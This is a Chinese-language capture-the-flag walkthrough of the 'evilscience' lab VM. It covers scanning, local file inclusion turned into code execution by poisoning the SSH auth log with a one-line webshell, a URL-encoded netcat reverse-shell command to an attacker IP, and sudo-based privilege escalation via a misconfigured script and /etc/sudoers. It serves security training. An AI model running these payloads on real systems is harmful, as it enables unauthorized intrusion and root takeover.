kali滲透綜合靶機(十六)--evilscience靶機
一、主機發現
1.netdiscover -i eth0 -r 192.168.10.0/24
二、端口掃描
1. masscan --rate=10000 -p0-65535 192.168.10.195
三、端口服務識別
1. nmap -sV -T4 -O -p 22,80 192.168.10.195
四、漏洞查找與利用
1.目錄掃描
2. 發現http://192.168.10.195/fuck,下載下來沒啥用
3.發現http://192.168.10.195/index.php?file=about.php 測試存在本地文件包含
4.包含/etc/passwd,失敗,嘗試用burp進行模糊測試,可以看到可以包含/var/log/auth.log文件,可以利用ssh登錄產生錯誤日志
5. 利用ssh登錄產生錯誤日志,可以看到錯誤信息寫入到日志中,可以利用ssh錯誤日志寫入一句話木馬
6.利用ssh日志寫入一句話木馬
7.測試一句話是否成功寫入,下圖可以看到成功執行,然后可以執行任何系統命令
8.反彈shell,需要對反彈shell中特殊符號進行url編碼,不要對整個url進行編碼
mknod+backpipe+p+%26%26+nc+192.168.1.66+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe
9.kali端開啟監聽,然后用python -c ‘import pty;pty.spawn(“/bin/bash”)’,重新打開一個終端
10.上圖看到用python -c 打開的一個終端還是受限的,需要在用awk ‘BEGIN{system(“/bin/bash”)}’重新打開一個終端
提權一:
1.Sudo -l查看是否屬於sudo組
2. 可以使用sudo權限不需要密碼執行xxxlogauditorxxx.py,查看一下該文件的權限, 該py文件的配置錯誤,導致可以直接以root權限執行命令,查看腳本存在命令執行漏洞
3.msfvenom生成一個payload,上傳到目標,增加執行權限
4.sudo運行該腳本,
5.kali開啟監聽
提權二:
1.首先給/etc/sudoers加寫入權限
2.然后把當前用戶以不用密碼的登錄方式添加到sudo組
3.sudo -i 獲得root權限